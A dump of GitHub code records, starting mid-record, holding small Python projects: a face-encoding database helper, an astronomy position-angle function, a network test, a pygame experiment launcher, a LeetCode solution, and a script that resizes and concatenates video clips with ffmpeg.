encodingsList.append(npArrayEncoding)\n encodingIdList.append(st[\"_id\"])\n\n return encodingsList,encodingIdList\n\ndef queryOneRecordFromDB(name):\n # the name should be an ID , get more details from database\n myquery = {\"_id\": name}\n student = DBCollection.find_one(myquery)\n return student\n","repo_name":"munabedan/Reco","sub_path":"DB.py","file_name":"DB.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"74344660890","text":"# From 
https://code.google.com/p/agpy/source/browse/trunk/agpy/posang.py\n# now at\n# https://github.com/keflavich/agpy/tree/master/agpy\n# Changes by Bryan Miller:\n# 2014jul22 - default system=radec\n# 2014jul22 - changed to ra2-ra1 so that sign matches posang.pro\n# RA1 = 66.15593384\n# DC1 = 33.95988843\n# RA2 = 66.15646079\n# DC2 = 33.96100069\n# print posang.posang(RA1,DC1,RA2,DC2)\n# 21.4522920312\n\nfrom astropy.coordinates import SkyCoord\nfrom numpy import pi,arctan2,sin,cos,tan\n# from astropy import units as u\n\ndef posang(l1,b1,l2,b2,system='radec',units='degrees',**kwargs):\n \"\"\"\n Return the position angle between two points assuming a rectilinear\n coordinate system (I think; at the very least I am making no corrections\n for wcs).\n\n INPUT:\n longitude1, latitude1, longitude2, latitude2\n\n \"\"\"\n\n if system.lower() == 'galactic':\n pos1 = SkyCoord(l1,b1,unit=('deg','deg'),frame='galactic')\n pos2 = SkyCoord(l2,b2,unit=('deg','deg'),frame='galactic')\n elif system.lower() in ('radec','fk5','icrs'):\n pos1 = SkyCoord(l1,b1,unit=('deg','deg'),frame='icrs')\n pos2 = SkyCoord(l2,b2,unit=('deg','deg'),frame='icrs')\n\n ra1,dec1 = pos1.icrs.ra.deg,pos1.icrs.dec.deg\n ra2,dec2 = pos2.icrs.ra.deg,pos2.icrs.dec.deg\n\n radiff = (ra2-ra1)/180.*pi\n\n angle = arctan2( sin(radiff) , cos(dec1*pi/180.)*tan(dec2*pi/180.) - sin(dec1*pi/180.)*cos(radiff) ) \n\n if units == 'degrees':\n return angle/pi*180.\n elif units == 'radians':\n return angle\n else:\n raise ValueError(\"Invalid units: %s\" % units)\n\nif __name__ == \"__main__\":\n\n RA1 = 66.15593384\n DC1 = 33.95988843\n RA2 = 66.15646079\n DC2 = 33.96100069\n print (posang(RA1,DC1,RA2,DC2))\n assert posang(RA1,DC1,RA2,DC2), 21.4522920312\n\n print (posang(RA1,DC1,RA2,DC2,system='galactic'))\n\n","repo_name":"bryanmiller/bwm_utils","sub_path":"posang.py","file_name":"posang.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24918433708","text":"\"\"\"Test optimization\"\"\"\n\nfrom pathlib import Path\n\nimport pytest\nimport numpy as np\n\nfrom bitwise_challenge_2022_2.network import BaseNetwork, NetworkGraph\nfrom bitwise_challenge_2022_2.optimize import _create_feasible_solutions\n\n\n@pytest.fixture(name=\"network_json\")\ndef network_json_fx() -> Path:\n \"\"\"Return path to challenge json\"\"\"\n return (\n Path(__file__).parents[1]\n / \"bitwise_challenge_2022_2\"\n / \"koodipahkina-data.json\"\n )\n\n\ndef test_create_feasible_solutions(network_json: Path):\n \"\"\"Solution vectors represent feasible solutions\"\"\"\n\n rng = np.random.default_rng()\n count = 7\n x_created = _create_feasible_solutions(network_json, rng, count)\n x_bool = x_created.astype(bool)\n\n assert len(x_created) == count\n\n base_network = BaseNetwork.from_json(network_json)\n base_matrix = base_network.to_adjacency_matrix()\n edges = base_network.get_edge_matrix()\n\n for i in range(count):\n new_net = NetworkGraph(base_matrix)\n new_net.remove_edges(edges[~x_bool[i]])\n assert new_net.is_connected\n","repo_name":"mkouhia/bitwise-challenge-2022-2","sub_path":"tests/test_optimize.py","file_name":"test_optimize.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"26701169423","text":"import threading\nimport logging\nimport pygame\nimport random\nimport acqui.tasks as tasks\nimport acqui.actions as actions\nimport acqui.clazz as clazz\nclass 
AcquiLauncher(threading.Thread):\n\t\"\"\"docstring for AcquiLauncher\"\"\"\n\tdef __init__(self,cnf,dataWriter):\n\t\tsuper(AcquiLauncher, self).__init__()\n\t\tself.logger=logging.getLogger(\"logger\")\n\t\tself.cnf=cnf\n\t\tself.dataWriter=dataWriter\n\t\tself.init_pygame()\n\t\tself.init_scheduler()\n\n\t\n\tdef init_pygame(self):\n\t\tself.logger.debug(\"Pygame init\")\n\t\tpygame.mixer.pre_init(frequency=44100, size=-16, channels=2, buffer=2048)\n\t\tpygame.init()\n\t\tsize = width,height =self.cnf['disp']['w'],self.cnf['disp']['h']\n\t\tself.screen = pygame.display.set_mode(size)\n\t\n\tdef init_scheduler(self):\n\t\tself.logger.debug(\"Scheduler init\")\n\t\t#inits\n\t\tself.schedulerRunning= tasks.Scheduler()\n\t\tself.schedulerStart= tasks.Scheduler()\n\t\tbg=actions.BackgroundAction((255,255,255),self.screen)\n\t\tcross=actions.CrossAction(\"imgs/cross.png\",self.screen)\n\t\tsnd=actions.SoundAction(self.cnf['snd'])\n\t\tpainters=[ clazz.ClazzPainter( self.screen,cl,140,[]) for cl in self.cnf['classes']]\n\t\tpool=clazz.RandomClassPool(painters,self.cnf['trials'])\n\t\tclazzAction=clazz.ClassAction(pool)\n\t\tdStart=actions.DataWriteStartAction(self.dataWriter)\n\t\tdStop=actions.DataWriteStopAction(self.dataWriter,pool)\n\t\t#idle\n\t\ttaskIdle=tasks.Task(duration_provider_factory(self.cnf['durations']['idle']))\n\t\ttaskIdle.addAction(bg)\n\t\tself.schedulerRunning.addTask(taskIdle)\n\t\t#show fix\n\t\ttaskFix=tasks.Task(duration_provider_factory( self.cnf['durations']['fixation'] ))\n\t\ttaskFix.addAction(bg)\n\t\ttaskFix.addAction(cross)\n\t\ttaskFix.addAction(snd)\n\t\ttaskFix.addAction(dStart)\n\t\tself.schedulerRunning.addTask(taskFix)\n\t\t#show class\n\t\ttaskClass=tasks.Task(duration_provider_factory( self.cnf['durations']['class']+300 ))\n\t\ttaskClass.addAction(bg)\n\t\ttaskClass.addAction(cross)\n\t\ttaskClass.addAction(dStop)\n\t\ttaskClass.addAction(clazzAction)\n\t\tself.schedulerRunning.addTask(taskClass)\n\n\t\t#Pause task\n\t\tmsg=actions.MessageAction(\"Press 'Any' key to start\",self.screen)\n\t\ttaskStart=tasks.Task(DurationProvider(500))\n\t\ttaskStart.addAction(bg)\n\t\ttaskStart.addAction(msg)\n\t\tself.schedulerStart.addTask(taskStart)\n\n\tdef run(self):\n\t\ttasks.Loop(self.schedulerRunning,self.schedulerStart).loop()\n\nclass DurationProvider(object):\n\t\"\"\"docstring for DurationProvider\"\"\"\n\tdef __init__(self,duration):\n\t\tsuper(DurationProvider, self).__init__()\n\t\tself.duration = duration\n\t\tself.logger=logging.getLogger(\"logger\")\n\n\tdef get(self):\n\t\treturn self.duration\t\n\t\n\nclass RangedDurationProvider(object):\n\t\"\"\"docstring for DurationProvider\"\"\"\n\tdef __init__(self,limits):\n\t\tsuper(RangedDurationProvider, self).__init__()\n\t\tself.logger=logging.getLogger(\"logger\")\n\t\tself.limits = limits\n\n\tdef get(self):\n\t\td=random.uniform(self.limits[0],self.limits[1])\n\t\tself.logger.debug(\"d %f\",d)\n\t\treturn d\n\ndef duration_provider_factory(duration):\n\t\"\"\"docstring for duration_provider_factory\"\"\"\n\tlogging.getLogger(\"logger\").debug(\"duration %s\"%duration.__class__.__name__)\n\tif type(duration) is tuple:\n\t\treturn RangedDurationProvider(duration)\n\telse:\n\t\treturn DurationProvider(duration)\n\ndef map_script(ch):\n\tif ch=='r':\n\t\treturn clazz.Clazz.RIGHT\n\tif ch=='l':\n\t\treturn clazz.Clazz.LEFT\n\tif ch=='u':\n\t\treturn clazz.Clazz.UP\n\tif ch=='d':\n\t\treturn 
clazz.Clazz.DOWN\n","repo_name":"capitancambio/brainz","sub_path":"brainz/acqui/launcher.py","file_name":"launcher.py","file_ext":"py","file_size_in_byte":3314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29108552650","text":"class Solution:\n def longestCommonPrefix(self, strs):\n \"\"\"\n :type strs: List[str]\n :rtype: str\n \"\"\"\n \"\"\"\n 解法一:\n 1.当strs为空时,返回空字符串\n 2.一次假设从0到len(strs[0]),在每一轮循环中:\n 1.如果strs中存在string比当前长度i还小,那么返回strs[0][:i]\n 2.如果strs存在index字符与LCP字符不同,则返回上一个LCP,返回strs[0][:i]\n \"\"\"\n if not strs:\n return ''\n for i in range(len(strs[0])):\n for str in strs:\n if len(str)<=i or strs[0][i] != str[i]:\n return strs[0][:i]\n return str[0]\n\n \"\"\"\n 解法二:创建一个len(strs)大小的列表,里面全是strs[0]\n 然后i从1到len(strs),如果strs[i]不以strs[0]为前缀,那么strs[0]删掉最后一位\n\n\n \"\"\"\n # if not strs:\n # return ''\n # dp = [strs[0]] * len(strs)\n # for i in range(1,len(strs)):\n # while not strs[i].startswith(dp[i-1]):\n # dp[i-1] = dp[i-1][:-1]\n # dp[i] = dp[i-1]\n # return dp[-1]\n\n \"\"\"\n 解法三:\n os.path.commonprefix()\n \"\"\"\n import os\n return os.path.commonprefix(strs)\n\n\nif __name__ == \"__main__\":\n\n strs = ['flower','flow','flight']\n strs1 = [\"dog\",\"racecar\",\"car\"]\n solution = Solution()\n result = solution.longestCommonPrefix(strs)\n # result = solution.longestCommonPrefix(strs1)\n\n print(result)\n","repo_name":"lxb1226/Leetcodeforpython","sub_path":"简单/14-longgestCommonPrefix.py","file_name":"14-longgestCommonPrefix.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"31988681761","text":"\n# concat:out:a0 -> Stream #0:1 (aac)\n# Press [q] to stop, [?] for help\n# frame= 0 fps=0.0 q=0.0 size= 0kB time=-577014:32:22.77 bitrate= -0.0kbits/s speed=N/A \n# [Parsed_concat_0 @ 00000128d3174f80] Input link in1:v0 parameters (size 1334x750, SAR 1:1) do not match the corresponding output link in0:v0 parameters (360x640, SAR 1:1)\n# [Parsed_concat_0 @ 00000128d3174f80] Failed to configure output pad on Parsed_concat_0\n# Error reinitializing filters!\n# Failed to inject frame into filter network: Invalid argument\n# Error while processing the decoded data for stream #42:0\n# Conversion failed!\n\n\n\n\n\n\nimport os\nfrom os import listdir\nfrom os.path import isfile, join\nfrom threading import Thread\n\n# \nimport subprocess\nimport cv2\nimport time\n# \nimport file_system_utils\nimport project_vars_handler\nimport vid_edit_utils\n\n\n# VIDS_TO_COMPILE_FOLDER_PATH = 'vids_to_compile'\nCLIPS_TO_COMPILE_DIR_PATH = project_vars_handler.get_var('current_data_dir_path') + '/clips_to_compile'\nMAX_CMD_CHARS = 8191\n# OUTPUT_VID_DIMS = [1080, 720, 480, 360, 240, 144] # other heights can work, but not all, so stick to these because they're safe\n \n# w h \nOUTPUT_VID_DIMS_L =[(3840,2160),\n (2560,1440),\n (1920,1080),\n (1280, 720),\n (854, 480),\n (640, 360),\n (426, 240)]\n\nVID_CONCAT_FILE_PATH = 'concat_filepaths.txt'\n# OUTPUT_VID_FILE_PATH = 'output.mp4'\n\n\n\ndef write_text_file(file_path, line_list):\n f = open(file_path, 'w', encoding='utf-8')\n # write to file\n for line in line_list:\n f.write(line + '\\n')\n # cleanup\n f.close()\n \n## do not delete until done with many full tests !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 
\n# # make sure everyone ends with .mp4\n# def clean_up_vid_extentions():\n# vid_filename_list = os.listdir(VIDS_TO_COMPILE_FOLDER_PATH)\n# \n# for vid_filename in vid_filename_list:\n# split_vid_filename = vid_filename.split('.')\n# if split_vid_filename[-1] != 'mp4':\n# new_vid_filename = split_vid_filename[0] + '.mp4'\n# os.rename(VIDS_TO_COMPILE_FOLDER_PATH + '/' + vid_filename, VIDS_TO_COMPILE_FOLDER_PATH + '/' + new_vid_filename)\n \n \n# dont delete until you have done a LOT of testing !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n# def get_height_of_vid(vid_file_path):\n# vid = cv2.VideoCapture(vid_file_path)\n# return vid.get(cv2.CAP_PROP_FRAME_HEIGHT)\n\n# def get_vid_dims(vid_file_path):\n# vid = cv2.VideoCapture(vid_file_path)\n# return (vid.get(cv2.CAP_PROP_FRAME_WIDTH), vid.get(cv2.CAP_PROP_FRAME_HEIGHT))\n \n \ndef get_height_of_tallest_vid_in_dir(dir_path):\n vid_file_paths = file_system_utils.get_relative_path_of_files_in_dir(dir_path, '.mp4')\n \n max_height = 0\n for vid_file_path in vid_file_paths:\n height = vid_edit_utils.get_vid_dims(vid_file_path)[1]\n if height > max_height:\n max_height = height\n return max_height\n\n# dont delete until you have done a LOT of testing !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n\n# def shortest_working_height(tallest_vid_height):\n# h = OUTPUT_VID_HEIGHTS[0]\n# for height in OUTPUT_VID_HEIGHTS[1:]:\n# if tallest_vid_height < height:\n# h = height\n# else:\n# break\n# return h\n\ndef smallest_working_dims(tallest_vid_height):\n dims = (0,0)\n \n if tallest_vid_height > OUTPUT_VID_DIMS_L[0][1]:\n raise Exception('ERROR: Clip height > tallest height in OUTPUT_VID_DIMS_L: %s > %s' %(tallest_vid_height, OUTPUT_VID_DIMS_L[0][1]))\n \n for valid_dims in OUTPUT_VID_DIMS_L:\n if tallest_vid_height <= valid_dims[1]:\n dims = valid_dims\n else:\n return dims\n# return dims\n\n\n# dont delete until you have done a LOT of testing !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n# def resize_all_vids_in_dir(new_height, dir_path):\n# from moviepy.editor import VideoFileClip # this here so annoying msg / load doesnt happen every gui start\n# \n# vid_file_paths = file_system_utils.get_relative_path_of_files_in_dir(dir_path, '.mp4')\n# \n# for vid_file_path in vid_file_paths:\n# if new_height != get_height_of_vid(vid_file_path):\n# clip = VideoFileClip(vid_file_path)\n# # clip_resized = clip.resize(height=new_height) # make the height 360px ( According to moviePy documenation The width is then computed so that the width/height ratio is conserved.)\n# clip_resized = clip.resize(height=1080, width=1920) # make the height 360px ( According to moviePy documenation The width is then computed so that the width/height ratio is conserved.)\n# \n# clip_resized.write_videofile('temp.mp4')\n# \n# clip.reader.close()\n# clip.audio.reader.close_proc()\n# \n# os.remove(vid_file_path)\n# os.rename('temp.mp4', vid_file_path)\n \n \ndef get_scaled_width(dims, new_h):\n og_ratio = dims[0] / dims[1]\n return og_ratio * new_h\n \n \n \ndef resize_all_vids_in_dir(dims, dir_path):\n vid_file_paths = file_system_utils.get_relative_path_of_files_in_dir(dir_path, '.mp4')\n \n o_w = str(dims[0])\n o_h = str(dims[1])\n \n for vid_file_path in vid_file_paths:\n temp_file_path = 'temp_' + vid_file_path.split('\\\\')[-1] \n \n \n vid_dims = vid_edit_utils.get_vid_dims(vid_file_path)\n scaled_w = get_scaled_width(vid_dims, dims[0]) # put back in after test 
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n\n if dims != vid_dims: \n w_pad = str( int((dims[0] - scaled_w / 4 ) ))\n h_pad = str( int((dims[1] - vid_dims[1]) / 2 ))\n cmd = 'ffmpeg -i ' + vid_file_path + ' -vf scale=' + o_w + ':' + o_h + ':force_original_aspect_ratio=decrease,pad=' + o_w + ':' + o_h + ':' + w_pad + ':' + h_pad + ',setsar=1 ' + temp_file_path + ' -y'\n print('cmd: ', cmd) #``````````````````````````````````````````````````````````````````````````````````````````````````````````````````` \n# cmd = 'ffmpeg -i ' + vid_file_path + ' -vf scale=' + str(dims[0]) + ':' + str(dims[1]) + ' temp.mp4'\n subprocess.call(cmd, shell=True)\n \n \n \n \n while(True):\n try: \n os.remove(vid_file_path)\n break\n except PermissionError as e:\n print('got permission error when deleting file, sleeping then trying again...')\n time.sleep(1)\n \n \n while(True):\n try: \n os.rename(temp_file_path, vid_file_path)\n break\n except PermissionError as e:\n print('got permission error when re-sizing, sleeping then trying again...')\n time.sleep(1)\n\n\n \ndef compile_all_clips_in_dir(clips_dir_path, output_vid_path):\n# from moviepy.editor import VideoFileClip, concatenate_videoclips # this here so annoying msg / load doesnt happen every gui start\n\n # build concat txt file\n# line_list = []\n# vid_filenames_to_compile = [f for f in listdir(clips_dir_path) if isfile(join(clips_dir_path, f))]\n# \n# for vid_filename in vid_filenames_to_compile:\n# vid_file_path = CLIPS_TO_COMPILE_DIR_PATH + '/' + vid_filename \n# line_list.append('file ' + vid_file_path)\n# # print(line_list)#``````````````````````````````````````````````````````````````````````````````````````````````````````````````\n# write_text_file(VID_CONCAT_FILE_PATH, line_list)\n# \n# \n# # concat the files in the txt file\n# cmd = 'ffmpeg -f concat -i ' + VID_CONCAT_FILE_PATH + ' -c copy ' + output_vid_path + ' -y'\n# print('cmd: ', cmd)#`````````````````````````````````````````````````````````````````````````````````````````````````\n# subprocess.call(cmd, shell=True)\n\n\n# def _make_input_files_str(vid_filenames_to_compile):\n# input_files_str = ''\n# for vid_filename in vid_filenames_to_compile:\n# vid_file_path = clips_dir_path + '/' + vid_filename \n# input_files_str += ' -i ' + vid_file_path\n# return input_files_str\n \n def _try_to_rename_until_sucsessful_if_exists(src_path, dest_path):\n if os.path.exists(src_path):\n if os.path.exists(dest_path):\n os.remove(dest_path)\n while(True):\n try:\n os.rename(src_path, dest_path)\n break\n except PermissionError:\n print('got PermissionError while trying to rename %s --> %s, sleeping then trying again...' 
%(src_path, dest_path))\n time.sleep(0.5)\n \n \n # put this back in below func !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n def _make_input_files_str(vid_path_l):\n input_files_str = ''\n for vid_path in vid_path_l:\n input_files_str += ' -i ' + vid_path\n return input_files_str\n \n \n def _make_thread_cmd_str_l(vid_paths_to_compile, save_file_name = None):\n\n def __make_cmd_str(vid_paths_to_compile, output_file_path):\n input_files_str = _make_input_files_str(vid_paths_to_compile)\n num_clips_str = str( len(vid_paths_to_compile) )\n cmd = 'ffmpeg' + input_files_str + ' -filter_complex \"[0:v:0] [0:a:0] [1:v:0] [1:a:0] concat=n=' + num_clips_str + ':v=1:a=1 [v] [a]\" -map \"[v]\" -map \"[a]\" ' + output_file_path + ' -y'\n return cmd\n \n def __all_cmd_str_fit(cmd_str_l):\n for cmd_str in cmd_str_l:\n if len(cmd_str) > MAX_CMD_CHARS:\n return False\n return True\n \n def __split_list(alist, wanted_parts=1):\n length = len(alist)\n return [ alist[i*length // wanted_parts: (i+1)*length // wanted_parts] \n for i in range(wanted_parts) ]\n \n if save_file_name == None:\n thread_output_file_path_list = ['thread_temp_1.mp4']\n else: \n thread_output_file_path_list = [save_file_name]\n\n cmd_str_l = [__make_cmd_str(vid_paths_to_compile, thread_output_file_path_list[0])]\n num_threads = 1\n \n while(not __all_cmd_str_fit(cmd_str_l)):\n cmd_str_l = []\n num_threads += 1\n thread_output_file_path_list.append('thread_temp_' + str(num_threads) + '.mp4')\n\n vid_path_ll = __split_list(vid_paths_to_compile, num_threads)\n for vid_path_l_num, vid_path_l in enumerate(vid_path_ll):\n cmd_str_l.append(__make_cmd_str(vid_path_l, thread_output_file_path_list[vid_path_l_num]))\n \n \n return cmd_str_l, thread_output_file_path_list\n \n \n# # this one works but cmd line str can be too long !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n vid_filenames_to_compile = [f for f in listdir(clips_dir_path) if isfile(join(clips_dir_path, f))]\n vid_paths_to_compile = []\n for vid_filename in vid_filenames_to_compile:\n vid_paths_to_compile.append(clips_dir_path + '/' + vid_filename)\n \n# print('vid_paths_to_compile: ', vid_paths_to_compile)#```````````````````````````````````````````````````````````\n \n thread_cmd_str_l, thread_output_file_path_list = _make_thread_cmd_str_l(vid_paths_to_compile)\n\n if len(thread_cmd_str_l) == 1:\n# print('cmd: ', thread_cmd_str_l[0])#````````````````````````````````````````````````````````````````````````````\n subprocess.call(thread_cmd_str_l[0],shell=True) \n \n# print('about to rename')#```````````````````````````````````````````````````````````````````````````````````````````\n _try_to_rename_until_sucsessful_if_exists(thread_output_file_path_list[0], output_vid_path)\n# print('just renamed')#```````````````````````````````````````````````````````````````````````````````````````````\n\n \n else:\n def run_subprocess(thread_cmd_str):\n subprocess.call(thread_cmd_str, shell=True)\n thread_l = []\n for thread_cmd_str in thread_cmd_str_l:\n print(thread_cmd_str)#`````````````````````````````````````````````````````````````````````````````````````\n th = Thread(target=run_subprocess, args=(thread_cmd_str,) ) \n thread_l.append(th)\n \n for thread in thread_l:\n thread.start()\n \n for thread in thread_l:\n thread.join()\n \n \n final_output_temp_vid_path = 'final_temp.mp4' # probably dont need to use this, error was unrelated, but im lazy\n thread_cmd_str_l_2, thread_output_file_path_list_2 = 
_make_thread_cmd_str_l(thread_output_file_path_list, final_output_temp_vid_path)\n# print(thread_cmd_str_l_2)#```````````````````````````````````````````````````````````````````````````\n\n subprocess.call(thread_cmd_str_l_2[0], shell=True)\n \n file_system_utils.delete_if_exists(output_vid_path)\n _try_to_rename_until_sucsessful_if_exists(thread_output_file_path_list_2[0], output_vid_path)\n\n \n # delete temp thread vids\n for thread_output_file_path in thread_output_file_path_list:\n os.remove(thread_output_file_path)\n \n print('done with compile, num threads: ', len(thread_cmd_str_l))#``````````````````````````````````````````````````````\n \n# input_files_str = _make_input_files_str(vid_filenames_to_compile)\n# for vid_filename in vid_filenames_to_compile:\n# vid_file_path = clips_dir_path + '/' + vid_filename \n# input_files_str += ' -i ' + vid_file_path\n \n# num_clips = str(len(vid_filenames_to_compile))\n# \n# cmd = 'ffmpeg ' + input_files_str + ' -filter_complex \"[0:v:0] [0:a:0] [1:v:0] [1:a:0] concat=n=' + num_clips + ':v=1:a=1 [v] [a]\" -map \"[v]\" -map \"[a]\" ' + output_vid_path + ' -y'\n# print('cmd: ', cmd)#`````````````````````````````````````````````````````````````````````````````````````````````````\n# \n# subprocess.call(cmd,shell=True) \n\n\n# vid_filenames_to_compile = [f for f in listdir(clips_dir_path) if isfile(join(clips_dir_path, f))]\n# clip_list = []\n# for vid_filename in vid_filenames_to_compile:\n# clip = VideoFileClip(clips_dir_path + '/' + vid_filename)\n# clip_list.append(clip)\n# # clip.reader.close()\n# # clip.audio.reader.close_proc()\n# \n# final_clip = concatenate_videoclips(clip_list, method='compose')\n# final_clip.write_videofile(output_vid_path) \n\n\n\n# compile_progress_clip_path = clips_dir_path + '/prog/' + 'A.mp4'\n# temp_compile_progress_clip_path = clips_dir_path + '/' + 'temp_prog.mp4'\n# compile_progress_clip_backup_path = clips_dir_path + '/temp_prog'# + 'A_backup.mp4'\n# vid_filenames_to_compile = [f for f in listdir(clips_dir_path) if isfile(join(clips_dir_path, f))]\n# cnt = 0# just for testing !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n# \n# while(len(vid_filenames_to_compile) > 1):\n# cnt += 1 # just for testing !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n# \n# \n# \n# \n# if os.path.isfile(compile_progress_clip_path):\n# clip_1_path = compile_progress_clip_path\n# else:\n# clip_1_path = clips_dir_path + '/' + vid_filenames_to_compile[0]\n# clip_2_path = clips_dir_path + '/' + vid_filenames_to_compile[1]\n# input_files_str = ' -i ' + clip_1_path + ' -i ' + clip_2_path\n# \n# \n# # input_files_str = ''\n# # for vid_filename in vid_filenames_to_compile[0:2]:\n# # vid_file_path = clips_dir_path + '/' + vid_filename \n# # input_files_str += ' -i ' + vid_file_path\n# \n# print('input_files_str: ', input_files_str)\n# \n# # cmd = 'ffmpeg ' + input_files_str + ' -filter_complex \"[0:v:0] [0:a:0] [1:v:0] [1:a:0] concat=n=2:v=1:a=1 [v] [a]\" -map \"[v]\" -map \"[a]\" ' + output_vid_path + ' -y'\n# cmd = 'ffmpeg ' + input_files_str + ' -filter_complex \"[0:v:0] [0:a:0] [1:v:0] [1:a:0] concat=n=2:v=1:a=1 [v] [a]\" -map \"[v]\" -map \"[a]\" ' + 'temp.mp4' + ' -y'\n# \n# # print('sleeping...')\n# # time.sleep(5)\n# print('cmd: ', cmd)#````````````````````````````````````````````````````````````````````````````````````````````````````````````````\n# subprocess.call(cmd,shell=True) \n# \n# 
file_system_utils.delete_if_exists(compile_progress_clip_path)\n# os.rename('temp.mp4', compile_progress_clip_path)\n# \n# \n# # for vid_filename in vid_filenames_to_compile[0:2]:\n# # vid_path = clips_dir_path + '/' + vid_filename\n# # if vid_path != compile_progress_clip_path: \n# # os.remove(vid_path)\n# \n# if clip_1_path != compile_progress_clip_path:\n# os.remove(clip_1_path)\n# os.remove(clip_2_path)\n# \n# \n# \n# vid_filenames_to_compile = [f for f in listdir(clips_dir_path) if isfile(join(clips_dir_path, f))]\n# \n# #copy the currently working vid so far just in case something goes wrong\n# # file_system_utils.copy_files_to_dest([compile_progress_clip_path], compile_progress_clip_backup_path + str(cnt))\n# \n# os.rename(compile_progress_clip_path, output_vid_path)\n\n\n\n\n\n\n\n\n \n# compile_progress_clip_path = clips_dir_path + '/' + 'A.mp4'\n# vid_filenames_to_compile = [f for f in listdir(clips_dir_path) if isfile(join(clips_dir_path, f))]\n# cnt = 0# just for testing !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n# while(len(vid_filenames_to_compile) > 1):\n# cnt += 1 # just for testing !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n# clip_0 = VideoFileClip(clips_dir_path + '/' + vid_filenames_to_compile[0])\n# clip_1 = VideoFileClip(clips_dir_path + '/' + vid_filenames_to_compile[1])\n# \n# final_clip = concatenate_videoclips([clip_0, clip_1], method='compose')\n# final_clip.write_videofile(compile_progress_clip_path) \n# \n# clip_0.reader.close()\n# clip_0.audio.reader.close_proc()\n# clip_1.reader.close()\n# clip_1.audio.reader.close_proc()\n# \n# for vid_filename in vid_filenames_to_compile[0:2]:\n# vid_path = clips_dir_path + '/' + vid_filename\n# if vid_path != compile_progress_clip_path: \n# os.remove(vid_path)\n# \n# vid_filenames_to_compile = [f for f in listdir(clips_dir_path) if isfile(join(clips_dir_path, f))]\n# \n# os.rename(compile_progress_clip_path, output_vid_path)\n \n# compile_progress_vid_file_path = 'compile_progress.mp4'\n\n print('done with compile')\n \n \n\n \n \ndef compile_clips(clip_path_list, output_file_path, prog_widget_d = None):\n c_start = time.time()\n \n# if prog_widget_d != None:\n# prog_widget_d['lbl_frm'].grid(column=1, row=40)\n \n# print('in compile, about to comile these clips: ', clip_path_list)\n print('deleting all files in dir: ' + CLIPS_TO_COMPILE_DIR_PATH + ' if it exists...')\n if os.path.exists(CLIPS_TO_COMPILE_DIR_PATH):\n file_system_utils.delete_all_files_in_dir(CLIPS_TO_COMPILE_DIR_PATH)\n \n print('copying accepted clips to new dir: ' + CLIPS_TO_COMPILE_DIR_PATH + ' ...')\n file_system_utils.copy_files_to_dest(clip_path_list, CLIPS_TO_COMPILE_DIR_PATH)\n \n# print('resizing clips in dir...')\n# if prog_widget_d != None:\n# prog_widget_d['resize_pb'].start(10)\n \n tallest_vid_height = get_height_of_tallest_vid_in_dir(CLIPS_TO_COMPILE_DIR_PATH)\n output_vid_dims = smallest_working_dims(tallest_vid_height)\n resize_all_vids_in_dir(output_vid_dims, CLIPS_TO_COMPILE_DIR_PATH)\n \n print('resize complete, total time: ', time.time() - c_start)\n \n print('compiling all clips in: ', clip_path_list)\n compile_all_clips_in_dir(CLIPS_TO_COMPILE_DIR_PATH, output_file_path)\n \n print('compile complete, total time: ', time.time() - c_start)\n \n \n# resize_all_vids_in_dir(1080, VIDS_TO_COMPILE_FOLDER_PATH)\nif __name__ == '__main__':\n start_time = time.time()\n print('in compile main!!!!!!!!!!!!')\n# 
